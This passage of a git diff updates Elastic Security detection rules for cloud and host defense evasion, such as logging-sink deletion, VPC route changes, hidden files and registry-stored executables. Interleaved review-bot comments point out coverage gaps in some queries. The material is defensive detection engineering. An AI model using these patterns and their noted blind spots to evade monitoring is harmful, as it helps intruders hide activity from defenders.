+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_sink_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_sink_deletion.json
index f604365ca46e6..ab27264fe76e7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_sink_deletion.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_sink_deletion.json
@@ -13,13 +13,37 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Logging Sink Deletion",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.logging.v*.ConfigServiceV*.DeleteSink and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.DeleteSink and event.outcome:success\n",
 "references": [
 "https://cloud.google.com/logging/docs/export"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "51859fa0-d86b-4214-bf48-ebb30ed91305",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -48,5 +72,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_subscription_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_subscription_deletion.json
index b3fe5da917406..8980df008011c 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_subscription_deletion.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_subscription_deletion.json
@@ -13,13 +13,37 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Pub/Sub Subscription Deletion",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.pubsub.v*.Subscriber.DeleteSubscription and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:google.pubsub.v*.Subscriber.DeleteSubscription and event.outcome:success\n",
 "references": [
 "https://cloud.google.com/pubsub/docs/overview"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "cc89312d-6f47-48e4-a87c-4977bd4633c3",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -48,5 +72,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_topic_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_topic_deletion.json
index 2b90f7601204f..3b8f17f836468 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_topic_deletion.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_topic_deletion.json
@@ -13,13 +13,37 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Pub/Sub Topic Deletion",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.pubsub.v*.Publisher.DeleteTopic and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.DeleteTopic and event.outcome:success\n",
 "references": [
 "https://cloud.google.com/pubsub/docs/overview"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "3202e172-01b1-4738-a932-d024c514ba72",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -48,5 +72,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_configuration_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_configuration_modified.json
index 063e844c990be..4ad9794870d03 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_configuration_modified.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_configuration_modified.json
@@ -13,13 +13,37 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Storage Bucket Configuration Modification",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:\"storage.buckets.update\" and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:\"storage.buckets.update\" and event.outcome:success\n",
 "references": [
 "https://cloud.google.com/storage/docs/key-terms#buckets"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "97359fd8-757d-4b1d-9af1-ef29e4a8680e",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -27,9 +51,27 @@
 "GCP",
 "Continuous Monitoring",
 "SecOps",
- "Identity and Access"
+ "Identity and Access",
+ "Defense Evasion"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1578",
+ "name": "Modify Cloud Compute Infrastructure",
+ "reference": "https://attack.mitre.org/techniques/T1578/"
+ }
+ ]
+ }
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_permissions_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_permissions_modified.json
index c0a3c90853d79..a5a270795266a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_permissions_modified.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_permissions_modified.json
@@ -13,13 +13,37 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Storage Bucket Permissions Modification",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:\"storage.setIamPermissions\" and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:\"storage.setIamPermissions\" and event.outcome:success\n",
 "references": [
 "https://cloud.google.com/storage/docs/access-control/iam-permissions"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "2326d1b2-9acf-4dee-bd21-867ea7378b4d",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -48,5 +72,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_network_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_network_deleted.json
new file mode 100644
index 0000000000000..317d75f88db0d
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_network_deleted.json
@@ -0,0 +1,84 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies when a Virtual Private Cloud (VPC) network is deleted in Google Cloud Platform (GCP). A VPC network is a virtual version of a physical network within a GCP project. Each VPC network has its own subnets, routes, and firewall, as well as other elements. An adversary may delete a VPC network in order to disrupt their target's network and business operations.",
+ "false_positives": [
+ "Virtual Private Cloud networks may be deleted by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior."
+ ],
+ "index": [
+ "filebeat-*",
+ "logs-gcp*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "GCP Virtual Private Cloud Network Deletion",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:v*.compute.networks.delete and event.outcome:success\n",
+ "references": [
+ "https://cloud.google.com/vpc/docs/vpc"
+ ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "c58c3081-2e1d-4497-8491-e73a45d1a6d6",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Elastic",
+ "Cloud",
+ "GCP",
+ "Continuous Monitoring",
+ "SecOps",
+ "Configuration Audit",
+ "Defense Evasion"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.007",
+ "name": "Disable or Modify Cloud Firewall",
+ "reference": "https://attack.mitre.org/techniques/T1562/007/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 7
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_route_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_route_created.json
new file mode 100644
index 0000000000000..70bb5d35cca68
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_route_created.json
@@ -0,0 +1,80 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies when a virtual private cloud (VPC) route is created in Google Cloud Platform (GCP). Google Cloud routes define the paths that network traffic takes from a virtual machine (VM) instance to other destinations. These destinations can be inside a Google VPC network or outside it. An adversary may create a route in order to impact the flow of network traffic in their target's cloud environment.", + "false_positives": [ + "Virtual Private Cloud routes may be created by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "index": [ + "filebeat-*", + "logs-gcp*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "GCP Virtual Private Cloud Route Creation", + "note": "", + "query": "event.dataset:gcp.audit and event.action:(v*.compute.routes.insert or \"beta.compute.routes.insert\")\n", + "references": [ + "https://cloud.google.com/vpc/docs/routes", + "https://cloud.google.com/vpc/docs/using-routes" + ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9180ffdf-f3d0-4db3-bf66-7a14bcff71b8", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Elastic", + "Cloud", + "GCP", + "Continuous Monitoring", + "SecOps", + "Configuration Audit", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": 
"https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 9 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_route_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_route_deleted.json new file mode 100644 index 0000000000000..dbbf5367c0baf --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_route_deleted.json 
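Review bot: This query has no `event.outcome:success` clause, unlike the two GCP network/route deletion rules in this commit, so denied or failed `routes.insert` calls also raise an alert. If alerting on attempts is deliberate (defensible for a low-severity rule), the description or the `false_positives` entry should say so; otherwise append ` and event.outcome:success` to the query and add `event.outcome` to `required_fields` so the two lists stay in step with the sibling rules.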
@@ -0,0 +1,85 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies when a Virtual Private Cloud (VPC) route is deleted in Google Cloud Platform (GCP). Google Cloud routes define the paths that network traffic takes from a virtual machine (VM) instance to other destinations. These destinations can be inside a Google VPC network or outside it. An adversary may delete a route in order to impact the flow of network traffic in their target's cloud environment.", + "false_positives": [ + "Virtual Private Cloud routes may be deleted by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "index": [ + "filebeat-*", + "logs-gcp*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "GCP Virtual Private Cloud Route Deletion", + "note": "", + "query": "event.dataset:gcp.audit and event.action:v*.compute.routes.delete and event.outcome:success\n", + "references": [ + "https://cloud.google.com/vpc/docs/routes", + "https://cloud.google.com/vpc/docs/using-routes" + ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a17bcc91-297b-459b-b5ce-bc7460d8f82a", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Cloud", + "GCP", + "Continuous Monitoring", + "SecOps", + "Configuration Audit", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + 
"name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 7 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_guardduty_detector_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_guardduty_detector_deletion.json index 343fa6ad88956..bfd280fc0defe 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_guardduty_detector_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_guardduty_detector_deletion.json 
@@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS GuardDuty Detector Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:guardduty.amazonaws.com and event.action:DeleteDetector and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/guardduty/delete-detector.html", "https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeleteDetector.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "523116c0-d89d-4d7c-82c2-39e6845a78ef", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_file_dir_tmp.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_file_dir_tmp.json index c4dfa95c5bc05..00e0973fd8cf1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_file_dir_tmp.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_file_dir_tmp.json 
@@ -14,11 +14,34 @@ "language": "eql", "license": "Elastic License v2", "max_signals": 33, - "name": "Creation of Hidden Files and Directories", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.working_directory in (\"/tmp\", \"/var/tmp\", \"/dev/shm\") and\n process.args regex~ \"\"\"\\.[a-z0-9_\\-][a-z0-9_\\-\\.]{1,254}\"\"\" and\n not process.name in (\"ls\", \"find\")\n", + "name": "Creation of Hidden Files and Directories via CommandLine", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.working_directory in (\"/tmp\", \"/var/tmp\", \"/dev/shm\") and\n process.args regex~ \"\"\"\\.[a-z0-9_\\-][a-z0-9_\\-\\.]{1,254}\"\"\" and\n not process.name in (\"ls\", \"find\", \"grep\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 10 } 
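Review bot: The widened exclusion `not process.name in ("ls", "find", "grep")` is keyed on the process basename alone, so the allow-list is only as strong as the executable's file name; if the data source populates `process.executable`, pinning the exclusion to the installed binary paths (and adding that field to `required_fields`) keeps the suppression while narrowing what it covers. The rule name now says "via CommandLine", but the description and any `false_positives` list lie outside this hunk and presumably still describe the old scope; the new `grep` exclusion in particular deserves a `false_positives` entry naming the benign pattern it suppresses.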
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_shared_object.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_shared_object.json
new file mode 100644
index 0000000000000..b276a5afbcc17
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_shared_object.json
@@ -0,0 +1,72 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a \".\" as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion.",
+ "from": "now-9m",
+ "index": [
+ "auditbeat-*",
+ "logs-endpoint.events.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "max_signals": 33,
+ "name": "Creation of Hidden Shared Object File",
+ "note": "",
+ "query": "file where event.action : \"creation\" and file.extension == \"so\" and file.name : \".*.so\" \n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.extension",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "severity": "medium",
+ "tags": [
+ "Elastic",
+ "Host",
+ "Linux",
+ "Threat Detection",
+ "Defense Evasion"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1564",
+ "name": "Hide Artifacts",
+ "reference": "https://attack.mitre.org/techniques/T1564/",
+ "subtechnique": [
+ {
+ "id": "T1564.001",
+ "name": "Hidden Files and Directories",
+ "reference": "https://attack.mitre.org/techniques/T1564/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 2
+}
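Review bot: `file.extension == "so"` combined with `file.name : ".*.so"` only matches hidden files whose name ends in `.so`, so the common versioned form (`.libfoo.so.1`, whose `file.extension` is `1`) is not covered; widening the name test to `file.name : (".*.so", ".*.so.*")`, dropping the extension clause and removing `file.extension` from `required_fields` closes that gap. The index list includes `auditbeat-*`, yet the query matches `event.action : "creation"`; I believe the auditbeat file_integrity module reports `created` for this action, which would leave the auditbeat index with no effective coverage — worth confirming against a sample event before that index is advertised. Note also that `==` is case-sensitive while `:` is not, so the two tests on the same file differ in strictness.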
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hide_encoded_executable_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hide_encoded_executable_registry.json
index 709464c4cbb05..7f9a63d67c0bc 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hide_encoded_executable_registry.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hide_encoded_executable_registry.json
@@ -11,6 +11,13 @@
 "license": "Elastic License v2",
 "name": "Encoded Executable Stored in the Registry",
 "query": "registry where\n/* update here with encoding combinations */\n registry.data.strings : \"TVqQAAMAAAAEAAAA*\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "registry.data.strings",
+ "type": "wildcard"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "93c1ce76-494c-4f01-8167-35edfb52f7b1",
 "severity": "medium",
@@ -45,5 +52,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 5
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_iis_httplogging_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_iis_httplogging_disabled.json
index 642d307c42ef2..e4cb6c0ecd532 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_iis_httplogging_disabled.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_iis_httplogging_disabled.json
@@ -13,10 +13,38 @@ "license": "Elastic License v2", "max_signals": 33, "name": "IIS HTTP Logging Disabled", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"appcmd.exe\" or process.pe.original_file_name == \"appcmd.exe\") and\n process.args : \"/dontLog*:*True\" and\n not process.parent.name : \"iissetup.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -51,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_injection_msbuild.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_injection_msbuild.json index 43d662df271ee..f50a23003e940 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_injection_msbuild.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_injection_msbuild.json @@ -14,6 +14,18 @@ "license": "Elastic License v2", "name": "Process Injection by the Microsoft Build Engine", "query": "process.name:MSBuild.exe and event.action:\"CreateRemoteThread detected (rule: CreateRemoteThread)\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9", "severity": "low", @@ -58,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_install_root_certificate.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_install_root_certificate.json index 3397db22f51f3..c163ca1ce8f77 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_install_root_certificate.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_install_root_certificate.json 
@@ -14,10 +14,37 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Attempt to Install Root Certificate",
